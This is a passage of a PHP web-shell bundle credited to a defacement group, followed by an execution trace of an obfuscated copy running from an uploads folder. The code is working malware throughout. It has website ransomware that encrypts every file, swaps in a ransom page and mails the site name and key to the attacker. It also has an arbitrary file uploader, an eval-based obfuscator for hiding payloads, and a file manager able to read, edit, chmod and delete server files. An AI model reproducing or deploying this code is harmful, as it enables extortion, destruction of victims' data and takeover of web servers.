text-shadow: 0 0 13px #f9991d;\n font-family:\"Black Ops One\";\n }\n .gr {\n text-shadow: 0 0 13px red;\n font-family:\"Black Ops One\";\n }\n .kcwimg { \n width: 160px;\n height: 140px; \n } \n .caps {\n text-transform: uppercase;\n font-family: \"Cabin Sketch\";\n }\n\n #neonfont\n {\n text-shadow: 0 0 5px red;\n -webkit-transition: text-shadow 2s ease-out;\n -moz-transition: text-shadow 2s ease-out;\n -o-transition: text-shadow 2s ease-out;\n transition: text-shadow 2s ease-out;\n font-size:35px;\n font-weight: bolder;\n }\n #neonfont:hover{\n text-shadow: 0 0 30px red;\n }\n .mega {\n text-shadow: 4px 0 8px #0073B9;\n font-weight: bolder;\n font-family: \"Architects Daughter\";\n }\n .weare {\n font-family: \"Permanent Marker\";\n text-shadow: 0 0 3px red;\n font-size: 1.3em;\n }\n .thumb {\n width: 150px; \n height: 190px; \n margin: 70px auto;\n perspective: 1000px;\n }\n .thumb span {\n display: block; width: 100%; height: 100%;\n background: \n linear-gradient(rgba(0, 0, 0, 0.4), rgba(0, 0, 0, 0.4)), url(\"http://s29.postimg.org/7ru2q76jb/kcw_logo_deface.png\");\n background-size: 0, cover;\n transform-style: preserve-3d;\n transition: all 0.5s;\n }\n hr {\n\t\t\t box-shadow: 3px 3px 3px 3px #888888;\n\t\t\t color:#fff;\n\t\t\t margin-bottom: 2px;\n\t\t }\n\t\t .greeet {\n\t\t\t font-family:Aldrich;font-weight:bold;font-size:17px;\n\t\t } \n\t\t .enhance {\n\t\t\t padding: 1em 1em;\n\t\t\t background:url('');\n\t\t }\n\t\t .nop {\n\t\t\t background: rgba(32, 32, 32, .4);\n padding: 8px 8px;\n\t\t } \n\t\t .ipkey {\n\t\t\t width: 20%;\n transition: width 1s;\n -webkit-transition: width 1s;\n -moz-transition: width 1s;\n height: 40px;\n font-family:Montserrat;font-weight:bold;font-size:25px;\n\t\t }\n\t\t .ipkey:hover {\n\t\t\t width: 30%;\n\t\t }\n\t\t .iptxt {\n\t\t\t width: 50%;\n\t\t\t height: 40px;\n\t\t\t font-family:Montserrat;font-weight:bold;font-size:15px;\n\t\t }\n\t\t .button {\n\t\t\t background: #666;\n\t\t\t border: 1px solid #fff;\n\t\t\t height: 40px;\n\t\t\t font-size: 20px;\n\t\t\t border-radius: 5px 5px 5px 5px;\n\t\t\t text-transform: uppercase;\n\t\t\t color: #fff;\n\t\t }\n\t\t .button:hover {\n\t\t\t background: #000;\n\t\t }\n </style>\n </head>\n \n <body>\n <embed src=\"https://dl.dropboxusercontent.com/s/mnw91qaob50ozvl/we%20are%20anonymous.mp3?dl=0\" width=\"0\" height=\"0\" />\n <center>\n\t\t \n <!-- who we are? -->\n <div id=\"header\">\n\t\t <span class=\"glow\" style=\"font-size: 30pt;\">\xe2\x80\xaa<i class=\"fa fa-hand-o-right\" aria-hidden=\"true\"></i> BLACK PHANTOM CYBER <i class=\"fa fa-hand-o-left\" aria-hidden=\"true\"></i></span><br/>\n\t\t \t\t \n <div class=\"animated flip\"><span class=\"blueglow caps\"><font size=\"5\"><i class=\"fa fa-ravelry\" aria-hidden=\"true\"></i> YOUR SITE IS INFECTED BY RANSOMWARE <i class=\"fa fa-ravelry\" aria-hidden=\"true\"></i></font></span></div>\n </div>\n <!-- BPC Logo --> \n <div class=\"thumb kcwimg\">\n <span></span>\n </div>\n \n <!--encrypt msg -->\n <div class=\"animated infinite flash\"><span class=\"gr\" style='color:black; font-family: \"Luckiest Guy\"'><font size=\"5\"><i class=\"fa fa-lock\" aria-hidden=\"true\"></i> YOUR FILES HAVE BEEN ENCRYPTED <i class=\"fa fa-lock\" aria-hidden=\"true\"></i></font></span></div>\n <br>\n <!-- key -->\n <div class=\"nop\">\n <form action=\"\" method=\"post\">\n <p><i class=\"fa fa-hand-o-down\" aria-hidden=\"true\"></i> ENTER THE KEY TO DECRYPT FILES <i class=\"fa fa-unlock\" aria-hidden=\"true\"></i></p>\n <input type=\"text\" class=\"ipkey\" name=\"iokey\" />\n </form>\n </div> <!-- I4M -->\n <h1 style='font-family: \"Cherry Cream Soda\";'><b>\xe2\x9c\x97<span class=\"mega\">5H311_1NJ3C706</span>\xe2\x9c\x97</b></h1>\n <br>\n <br>\n \n\n <!-- warning -->\n <div class=\"weare\">We are Legion... We do not Forgive... We do not Forget... <b><i>Expect us</i></b></div>\n <br>\n </body>\n</html>")) {
echo "<i class=\"fa fa-thumbs-o-up\" aria-hidden=\"true\"></i> index.php (Default Page)<br>";
}
}
}
public function shcpackUnstall()
{
if (file_exists(".htaFuck")) {
if (unlink(".htaccess") && unlink("index.php")) {
echo "<i class=\"fa fa-thumbs-o-down\" aria-hidden=\"true\"></i> .htaccess (Default Page)<br>";
echo "<i class=\"fa fa-thumbs-o-down\" aria-hidden=\"true\"></i> index.php (Default Page)<br>";
}
rename(".htaFuck", ".htaccess");
}
}
public function plus()
{
flush();
ob_flush();
}
public function locate()
{
return getcwd();
}
public function shcdirs($dir, $method, $key)
{
switch ($method) {
case '1':
deRanSomeware::shcpackInstall();
break;
case '2':
deRanSomeware::shcpackUnstall();
break;
}
foreach (scandir($dir) as $d) {
if ($d != '.' && $d != '..') {
$locate = $dir . DIRECTORY_SEPARATOR . $d;
if (!is_dir($locate)) {
if (deRanSomeware::kecuali($locate, "ransmini.php") && deRanSomeware::kecuali($locate, ".pnjg") && deRanSomeware::kecuali($locate, ".htaccess") && deRanSomeware::kecuali($locate, "index.php") && deRanSomeware::kecuali($locate, "indehx.php") && deRanSomeware::kecuali($locate, ".htalol")) {
switch ($method) {
case '1':
deRanSomeware::shcEnCry($key, $locate);
deRanSomeware::shcEnDesDirS($locate, "1");
break;
case '2':
deRanSomeware::shcDeCry($key, $locate);
deRanSomeware::shcEnDesDirS($locate, "2");
break;
}
}
} else {
deRanSomeware::shcdirs($locate, $method, $key);
}
}
deRanSomeware::plus();
}
deRanSomeware::report($key);
}
public function report($key)
{
$message .= "========= Tuyuljahat =========\n";
$message .= "Website : " . $_SERVER['HTTP_HOST'];
$message .= "Key : " . $key;
$message .= "========= Ransomware =========\n";
$subject = "Report Ransomeware";
$headers = "From: Tuyul <TuyulJahat86@gmail.com>\r\n";
mail("TuyulJahat86@gmail.com", $subject, $message, $headers);
}
public function shcEnDesDirS($locate, $method)
{
switch ($method) {
case '1':
rename($locate, $locate . ".Encrypted");
break;
case '2':
$locates = str_replace(".Encrypted", "", $locate);
rename($locate, $locates);
break;
}
}
public function shcEnCry($key, $locate)
{
$data = file_get_contents($locate);
$iv = mcrypt_create_iv(mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC), MCRYPT_DEV_URANDOM);
$encrypted = base64_encode($iv . mcrypt_encrypt(MCRYPT_RIJNDAEL_128, hash('sha256', $key, true), $data, MCRYPT_MODE_CBC, $iv));
if (file_put_contents($locate, $encrypted)) {
echo '<i class="fa fa-lock" aria-hidden="true"></i> <font color="#00BCD4">Encrypted</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">' . $locate . '</font> <br>';
} else {
echo '<i class="fa fa-lock" aria-hidden="true"></i> <font color="#00BCD4">Encrypted</font> (<font color="red">Failed</font>) <font color="#FF9800">|</font> ' . $locate . ' <br>';
}
}
public function shcDeCry($key, $locate)
{
$data = base64_decode(file_get_contents($locate));
$iv = substr($data, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC));
$decrypted = rtrim(mcrypt_decrypt(MCRYPT_RIJNDAEL_128, hash('sha256', $key, true), substr($data, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)), MCRYPT_MODE_CBC, $iv), "\x00");
if (file_put_contents($locate, $decrypted)) {
echo '<i class="fa fa-unlock" aria-hidden="true"></i> <font color="#FFEB3B">Decrypted</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">' . $locate . '</font> <br>';
} else {
echo '<i class="fa fa-unlock" aria-hidden="true"></i> <font color="#FFEB3B">Decrypted</font> (<font color="red">Failed</font>) <font color="#FF9800">|</font> <font color="#2196F3">' . $locate . '</font> <br>';
}
}
public function kecuali($ext, $name)
{
$re = "/({$name})/";
preg_match($re, $ext, $matches);
if ($matches[1]) {
return false;
}
return true;
}
}
if ($_POST['submit']) {
switch ($_POST['method']) {
case '1':
deRanSomeware::shcdirs(deRanSomeware::locate(), "1", $_POST['key']);
break;
case '2':
deRanSomeware::shcdirs(deRanSomeware::locate(), "2", $_POST['key']);
break;
}
} else {
?>
<center>
<div style='font-size;color:red;'>
<pre>
@@@@@ @@@@@
@@@@@@@ @@@@@@@
@@@@@@@ @@@@@@@@@@@@@@@ @@@@@@@
@@@@@@@@ @@@@@@@@@@@@@@@@@@@ @@@@@@@@
@@@@@ @@@@@@@@@@@@@@@@@@@@@ @@@@@
@@@@@ @@@@@@@@@@@@@@@@@@@@@@@ @@@@@
@@ @@@@@@@@@@@@@@@@@@@@@@@@@ @@
@@@@@@@ @@@@@@ @@@@@@
@@@@@@ @@@@ @@@@@
@@@@@@ @@@@ @@@@@
@@@@@@ @@@@@@ @@@@@
@@@@@@@@@@@ @@@@@@@@@@
@@@@@@@@@@ @@@@@@@@@
@@ @@@@@@@@@@@@@@@@@ @@
@@@@ @@@@ @ @ @ @ @@@@ @@@@
@@@@@ @@@ @ @ @ @ @@@ @@@@@
@@@@@ @@@@@@@@@@@@@ @@@@@
@@@@ @@@@@@@@@@@ @@@@
@@@@@ @@@@@@@ @@@@@
@@@@@@@ @@@@@@@
@@@@@ @@@@@
-[ Contact : HackerBaloch07@gmail.com ]-
</pre>
<form action="" method="post" style=" text-align: center;">
<label>Key : </label>
<input type="text" name="key" class="inpute" placeholder="Password Key">
<select name="method" class="selecte">
<option value="1">Locked</option>
<option value="2">Unlocked</option>
</select>
<input type="submit" name="submit" class="submite" value="Submit" />
</form>
<?php
}
?>
<br>
<hr>
<br><br>
<h2><font color='red' face = 'iceland' > Uploader</h2> </font>
<?php
$files = @$_FILES["files"];
if ($files["name"] != '') {
$fullpath = $_REQUEST["path"] . $files["name"];
if (move_uploaded_file($files['tmp_name'], $fullpath)) {
echo "<a href='{$fullpath}' target='_blank'>Akses\r\n untuk {$fullpath}</a>";
}
}
echo "<form method=POST\r\n enctype=\"multipart/form-data\" action=\"\"><input\r\n type=\"file\" name=\"files\"><input type=submit\r\n value=\"Fire!\"></form></body></html>";
?>
<br>
</center>
</div>
</html>
<!DOCTYPE html>
<html lang="en">
<head>
<style>
body {
background-color: black;
}
body {
color: red;
font-size: 100%;
font-weight: bold;
font-family: Courier;
background-color: black;
}
input {
color: red;
color: red;
font-size: 100%;
font-weight: bold;
font-family: Courier;
border: 2px solid red;
border-radius: 4px;
background-color: black;
}
textarea {
color: red;
font-size: 100%;
font-weight: bold;
font-family: Courier;
border: 2px solid red;
border-radius: 4px;
background-color: black;
}
#content tr:hover{
background-color: black;
text-shadow:0px 0px 10px red;
}
#content .first{
background-color: black;
}
a{
color: red;
text-decoration: none;
}
</style>
</head>
<body>
<div class="heading">
<font><center><h1>Php Obfuscator By 5H311_1NJ3C706</h1></center></font>
</div>
<div class="subheading">
<center> <h3><font>paste your php code inside hit Enter done :P</font></h3></center>
</div>
<div class="input">
<form action="" method="POST">
<center> <textarea rows="9" cols="85" type="text" name="php" placeholder="Input Php Code Here"></textarea><br><br>
</center>
<center> <input type="submit" name="submit" value="Submit" /><br>
</center>
<?php
if (isset($_POST['submit'])) {
$phpcode = $_POST['php'];
if (!empty($phpcode)) {
$website = "http://" . $_SERVER['HTTP_HOST'];
$file_location = htmlspecialchars($_SERVER['REQUEST_URI']);
$all_in_one = $website . $file_location;
$obfuscate_high_level = strrev(base64_encode(gzdeflate(gzdeflate(gzdeflate(gzcompress(gzcompress($phpcode)))))));
echo ' <br><center><textarea rows="9" cols="85">
<?php
/*
CODE Successfully OBFUSCATED by 5H311_1NJ3C706 Obfuscator
Strongest PHP obfuscator ;)
Dont change the variables othervise code will not work.
If you are facing any problem contact me on Gmail.
5H311_1NJ3C706
Or mail me Hackerbaloch07@gmail.com ;)
*/
$Cyber = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNENyaW1lJTI5JTI5JTI5JTI5JTI5JTI5JTI5JTI5JTNC";
$Crime = "' . $obfuscate_high_level . '";
eval(htmlspecialchars_decode(urldecode(base64_decode($Cyber))));
exit;
?></textarea>
';
}
}
?>
</center>
</form>
</div>
<div class="footer">
</div>
</body>
</html>
<?php
error_reporting(0);
set_time_limit(0);
if (get_magic_quotes_gpc()) {
foreach ($_POST as $key => $value) {
$_POST[$key] = stripslashes($value);
}
}
echo "<!DOCTYPE HTML>\r\n<html>\r\n<head>\r\n<link href=\"\" rel=\"stylesheet\" type=\"text/css\">\r\n<title>5H311_1NJ3C706</title>\r\n<style>\r\nbody{\r\nfont-family: \"Courgette\", cursive;\r\n\tbackground-image: url(\" \");\r\n\tcolor:red;\r\n\tbackground-attachment:fixed;\r\n\tbackground-repeat:no-repeat;\r\n\tbackground-position:center;\r\n\tbackground-color:Black;\r\n\t-webkit-background-size: 100% 100%;\r\n}\r\nh1{\r\ncolor:red;\r\n-webkit-text-stroke: 0px #5ddcfc;\r\n}\r\n#content tr:hover{\r\nbackground-color: #5ddcfc;\r\ntext-shadow:1px 1px 0px #000;\r\n}\r\n#content .first{\r\ncolor:red;\r\nbackground-color: #5ddcfc;\r\n}\r\ntable{\r\nborder: 0px #9435dd solid;\r\n}\r\na{\r\ncolor:red;\r\ntext-decoration: none;\r\n}\r\na:hover{\r\ncolor:#9435dd;\r\ntext-shadow:0px 1px 0px #000;\r\n}\r\ninput,select,textarea{\r\nfont-family: Courgette;\r\nbackground-color:black;\r\ncolor:#5ddcfc;\r\nborder: 1px red solid;\r\n-moz-border-radius: 5px;\r\n-webkit-border-radius:5px;\r\nborder-radius:5px;\r\n\r\n}\r\n</style>\r\n</head>\r\n<body>\r\n<link href=\"https://fonts.googleapis.com/css?family=Courgette\" rel=\"stylesheet\">\r\n<center>\r\n<h1>CRACKER BY 5H311_1NJ3C706 </h1></center>\r\n<table width=\"700\" border=\"0\" cellpadding=\"4\" cellspacing=\"1\"align=\"center\">\r\n<tr><td><font color=\"#5ddcfc\">Current Dir :</font> ";
if (isset($_GET['path'])) {
$path = $_GET['path'];
} else {
$path = getcwd();
}
$path = str_replace('\\', '/', $path);
$paths = explode('/', $path);
foreach ($paths as $id => $pat) {
if ($pat == '' && $id == 0) {
$a = true;
echo "<a href=\"?path=/\">/</a>";
continue;
}
if ($pat == '') {
continue;
}
echo "<a href=\"?path=";
for ($i = 0; $i <= $id; $i++) {
echo "{$paths[$i]}";
if ($i != $id) {
echo "/";
}
}
echo '">' . $pat . '</a>/';
}
echo "</td></tr><tr><td>";
if (isset($_FILES['file'])) {
if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
echo "<font color=\"#5ddcfc\">Upload File Berhasil</font><br />";
} else {
echo "<font color=\"#9435dd\">Upload File Gagal</font><br/>";
}
}
echo "<form enctype=\"multipart/form-data\" method=\"POST\">\r\n<font color=\"#5ddcfc\">File Upload :</font><input type=\"file\" name=\"file\" /><input type=\"submit\" value=\"upload\" />\r\n</form>\r\n</td></tr>";
if (isset($_GET['filesrc'])) {
echo "<tr><td>Current File : ";
echo $_GET['filesrc'];
echo "</tr></td></table><br />";
echo ' <center><textarea style="width: 700px;height: 300px;" readonly> ' . htmlspecialchars(file_get_contents($_GET['filesrc'])) . '</textarea></center>';
} elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
echo '</table><br /><center>' . $_POST['path'] . '<br /><br />';
if ($_POST['opt'] == 'chmod') {
if (isset($_POST['perm'])) {
if (chmod($_POST['path'], $_POST['perm'])) {
echo "<font color=\"#5ddcfc\">Change Permission Berhasil</font><br/>";
} else {
echo "<font color=\"#9435dd\">Change Permission Gagal</font><br />";
}
}
echo '<form method="POST">
Permission : <input name="perm" type="text" size="4" value="' . substr(sprintf('%o', fileperms($_POST['path'])), -4) . '" />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="chmod">
<input type="submit" value="Go" />
</form>';
} elseif ($_POST['opt'] == 'rename') {
if (isset($_POST['newname'])) {
if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
echo "<font color=\"#5ddcfc\">Berhasil Mengganti Nama</font><br/>";
} else {
echo "<font color=\"#9435dd\">Gagal Mengganti Nama</font><br />";
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">
Nama Baru : <input name="newname" type="text" size="20" value="' . $_POST['name'] . '" />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="rename">
<input type="submit" value="Simpan" />
</form>';
} elseif ($_POST['opt'] == 'edit') {
if (isset($_POST['src'])) {
$fp = fopen($_POST['path'], 'w');
if (fwrite($fp, $_POST['src'])) {
echo "<font color=\"#5ddcfc\">Berhasil Edit File</font><br/>";
} else {
echo "<font color=\"#9435dd\">Gagal Edit File</font><br/>";
}
fclose($fp);
}
echo '<form method="POST">
<center><textarea style="width: 700px;height: 300px;" name="src"> ' . htmlspecialchars(file_get_contents($_POST['path'])) . '</textarea></center><br />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="edit">
<input type="submit" value="Simpan" />
</form>';
}
echo "</center>";
} else {
echo "</table><br/><center>";
if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
if ($_POST['type'] == 'dir') {
if (rmdir($_POST['path'])) {
echo "<font color=\"#5ddcfc\">Directory Berhasil Terhapus</font><br/>";
} else {
echo "<font color=\"#9435dd\">Directory Gagal Terhapus </font><br/>";
}
} elseif ($_POST['type'] == 'file') {
if (unlink($_POST['path'])) {
echo "<font color=\"#5ddcfc\">File Berhasil Terhapus</font><br/>";
} else {
echo "<font color=\"#9435dd\">File Gagal Dihapus</font><br/>";
}
}
}
echo "</center>";
$scandir = scandir($path);
echo "<div id=\"content\"><table width=\"700\" border=\"0\" cellpadding=\"4\" cellspacing=\"1\" align=\"center\">\r\n<tr class=\"first\">\r\n<td><center>Name</peller></center></td>\r\n<td><center>Size</peller></center></td>\r\n<td><center>Permission</peller></center></td>\r\n<td><center>Modify</peller></center></td>\r\n</tr>";
foreach ($scandir as $dir) {
if (!is_dir($path . '/' . $dir) || $dir == '.' || $dir == '..') {
continue;
}
echo '<tr>
<td><a href="?path=' . $path . '/' . $dir . '">' . $dir . '</a></td>
<td><center>----</center></td>
<td><center>';
if (is_writable($path . '/' . $dir)) {
echo "<font color=\" #00edff\">";
} elseif (!is_readable($path . '/' . $dir)) {
echo "<font color=\"red\">";
}
echo perms($path . '/' . $dir);
if (is_writable($path . '/' . $dir) || !is_readable($path . '/' . $dir)) {
echo "</font>";
}
echo '</center></td>
<td><center><form method="POST" action="?option&path=' . $path . '">
<select name="opt">
<option value="">Select</option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
</select>
<input type="hidden" name="type" value="dir">
<input type="hidden" name="name" value="' . $dir . '">
<input type="hidden" name="path" value="' . $path . '/' . $dir . '">
<input type="submit" value=">">
</form></center></td>
</tr>';
}
echo "<tr class=\"first\"><td></td><td></td><td></td><td></td></tr>";
foreach ($scandir as $file) {
if (!is_file($path . '/' . $file)) {
continue;
}
$size = filesize($path . '/' . $file) / 1024;
$size = round($size, 3);
if ($size >= 1024) {
$size = round($size / 1024, 2) . ' MB';
} else {
$size .= ' KB';
}
echo '<tr>
<td><a href="?filesrc=' . $path . '/' . $file . '&path=' . $path . '">' . $file . '</a></td>
<td><center>' . $size . '</center></td>
<td><center>';
if (is_writable($path . '/' . $file)) {
echo "<font color=\" #00edff\">";
} elseif (!is_readable($path . '/' . $file)) {
echo "<font color=\"red\">";
}
echo perms($path . '/' . $file);
if (is_writable($path . '/' . $file) || !is_readable($path . '/' . $file)) {
echo "</font>";
}
echo '</center></td>
<td><center><form method="POST" action="?option&path=' . $path . '">
<select name="opt">
<option value="">Select</option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
<option value="edit">Edit</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="' . $file . '">
<input type="hidden" name="path" value="' . $path . '/' . $file . '">
<input type="submit" value=">">
</form></center></td>
</tr>';
}
echo "</table>\r\n</div>";
}
echo "<center><br/> </center>\r\n<center><font color=\"red\" face=\"Courgette\" size=\"4\">Copyright © 2019 <font color=\"#9435dd\">BLACK PHANTOM CYBER</font></center>\r\n<body>\r\n\t\r\n\t<iframe width=\"0\" height=\"0\" src=\"https://k.top4top.net/m_12407hbmd0.mp3\" frameborder=\"0\" allowfullscreen></iframe>\r\n\t\r\n</body>\r\n</html>";
function perms($file)
{
$perms = fileperms($file);
if (($perms & 0xc000) == 0xc000) {
// Socket
$info = 's';
} elseif (($perms & 0xa000) == 0xa000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}
// Owner
$info .= $perms & 0x100 ? 'r' : '-';
$info .= $perms & 0x80 ? 'w' : '-';
$info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-');
// Group
$info .= $perms & 0x20 ? 'r' : '-';
$info .= $perms & 0x10 ? 'w' : '-';
$info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-');
// World
$info .= $perms & 0x4 ? 'r' : '-';
$info .= $perms & 0x2 ? 'w' : '-';
$info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-');
return $info;
}
};
exit;Execution traces
data/traces/d864686ea407aa04c71fe1968b9cc9a1_trace-1676255089.2179.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:25:15.115740]
1 0 1 0.000226 393464
1 3 0 0.000374 414744 {main} 1 /var/www/html/uploads/by.php 0 0
1 A /var/www/html/uploads/by.php 8 $Cyber = 'ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNENyaW1lJTI5JTI5JTI5JTI5JTI5JTI5JTI5JTI5JTNC'
1 A /var/www/html/uploads/by.php 9 $Crime = '==gwWSd3qUgptOw/cfb71dEDSyv/hfehpP4wM/qO0sLSzHjU88vfbegnvfBiKjvqYh2YO7gL8cMe4OfMXDbe+X/IPff6IC/8KITFHh5bVjwNuiZINz8Jy4EsBZDWuf9ph/w46jwFg2h6onyrldAjrlNAUsRmlkmJ30OHpM7AD7+zT6zSlGW+ha0HFiZApjV3ztu6FW8hzZBAlGzUY4xVpaFwV0yhqtFGwN5QVIJgwxi5RtEA0ZZHpzSYizSA0eJ5AHBdDHLdG/BxAHhL7yo7TCcUAXRcDXbcG7hP4IwsVugpRSNwdQ3w9SnxeQKwSkkQrpxPByLaYL6DRO0viwYKOHKjIt5aZBuY+rIZBwtL4p7Z/gDYjcvHNApnLzyiuO8CyvQsxzs97W6us1xdd9tI/slnprmGm8vd47500BnOQERifO87/j/Ci9PProhqcqKZJIOAYmRmmunIrx8k2vQ6T5515kMdO7vAzzwc/UT8/2YfRIfYrlkhC52leCOLedFP'
2 4 0 0.000444 414744 base64_decode 0 /var/www/html/uploads/by.php 10 1 'ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNENyaW1lJTI5JTI5JTI5JTI5JTI5JTI5JTI5JTI5JTNC'
2 4 1 0.000467 415032
2 4 R 'eval%28%26quot%3B%3F%26gt%3B%26quot%3B.gzuncompress%28gzuncompress%28gzinflate%28gzinflate%28gzinflate%28base64_decode%28strrev%28%24Crime%29%29%29%29%29%29%29%29%3B'
2 5 0 0.000488 415000 urldecode 0 /var/www/html/uploads/by.php 10 1 'eval%28%26quot%3B%3F%26gt%3B%26quot%3B.gzuncompress%28gzuncompress%28gzinflate%28gzinflate%28gzinflate%28base64_decode%28strrev%28%24Crime%29%29%29%29%29%29%29%29%3B'
2 5 1 0.000507 415224
2 5 R 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($Crime))))))));'
2 6 0 0.000525 414936 htmlspecialchars_decode 0 /var/www/html/uploads/by.php 10 1 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($Crime))))))));'
2 6 1 0.000544 415160
2 6 R 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($Crime))))))));'
2 7 0 0.000573 417280 eval 1 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($Crime))))))));' /var/www/html/uploads/by.php 10 0
3 8 0 0.000591 417280 strrev 0 /var/www/html/uploads/by.php(10) : eval()'d code 1 1 '==gwWSd3qUgptOw/cfb71dEDSyv/hfehpP4wM/qO0sLSzHjU88vfbegnvfBiKjvqYh2YO7gL8cMe4OfMXDbe+X/IPff6IC/8KITFHh5bVjwNuiZINz8Jy4EsBZDWuf9ph/w46jwFg2h6onyrldAjrlNAUsRmlkmJ30OHpM7AD7+zT6zSlGW+ha0HFiZApjV3ztu6FW8hzZBAlGzUY4xVpaFwV0yhqtFGwN5QVIJgwxi5RtEA0ZZHpzSYizSA0eJ5AHBdDHLdG/BxAHhL7yo7TCcUAXRcDXbcG7hP4IwsVugpRSNwdQ3w9SnxeQKwSkkQrpxPByLaYL6DRO0viwYKOHKjIt5aZBuY+rIZBwtL4p7Z/gDYjcvHNApnLzyiuO8CyvQsxzs97W6us1xdd9tI/slnprmGm8vd47500BnOQERifO87/j/Ci9PProhqcqKZJIOAYmRmmunIrx8k2vQ6T5515kMdO7vAzzwc/UT8/2YfRIfYrlkhC52leCOLedFP'
3 8 1 0.000626 433696
3 8 R 'AdckKNsB0iQt2wHNJDLbeJwBwiQ923ic7X1pc+JGt/DnSVX+g0J8g33jsQXYHuOFhH0ZwDY7JCmXNiOBtkhivc/89/ecbklIQtiemTxP1XvrkvIA6tOnT5/9dDedu59KD8Xe+LHMyI6m5n784c5/lzgR3hmGuXMUR5VynXy7+9BiurVys8m06u363TltAGDb2agS42xM6T7hSGvnXLDtBDTwhrhh/odgYXhOmE8tY6GLN8zPqXyqmKrc0hbBUA0LHkpp/A8efvnxhzNFNxeO5PU1LFGyPpJhbhjRcBxJvA01eTgyn7JXLHsbHdJrdyxOt03OknQnPPhKVhzJfYQz+MipylS/YQSAlCyXJltSJeHriZpakqR/PUleNzLygtcUf+Sv4shFMV+5/A6O4PCWZC9Uh4weZI4qvTgU4u6cUIK6oCr6nLEk9T5BHtmyJDmJqG4wsiW93CdkxzHtm/NzjVsLon7GG4ZjA0EmfhEM7fzF0GGwlWQbmnR+cXZ1lsHe'
3 9 0 0.000661 433664 base64_decode 0 /var/www/html/uploads/by.php(10) : eval()'d code 1 1 'AdckKNsB0iQt2wHNJDLbeJwBwiQ923ic7X1pc+JGt/DnSVX+g0J8g33jsQXYHuOFhH0ZwDY7JCmXNiOBtkhivc/89/ecbklIQtiemTxP1XvrkvIA6tOnT5/9dDedu59KD8Xe+LHMyI6m5n784c5/lzgR3hmGuXMUR5VynXy7+9BiurVys8m06u363TltAGDb2agS42xM6T7hSGvnXLDtBDTwhrhh/odgYXhOmE8tY6GLN8zPqXyqmKrc0hbBUA0LHkpp/A8efvnxhzNFNxeO5PU1LFGyPpJhbhjRcBxJvA01eTgyn7JXLHsbHdJrdyxOt03OknQnPPhKVhzJfYQz+MipylS/YQSAlCyXJltSJeHriZpakqR/PUleNzLygtcUf+Sv4shFMV+5/A6O4PCWZC9Uh4weZI4qvTgU4u6cUIK6oCr6nLEk9T5BHtmyJDmJqG4wsiW93CdkxzHtm/NzjVsLon7GG4ZjA0EmfhEM7fzF0GGwlWQbmnR+cXZ1lsHe'
3 9 1 0.000723 450080
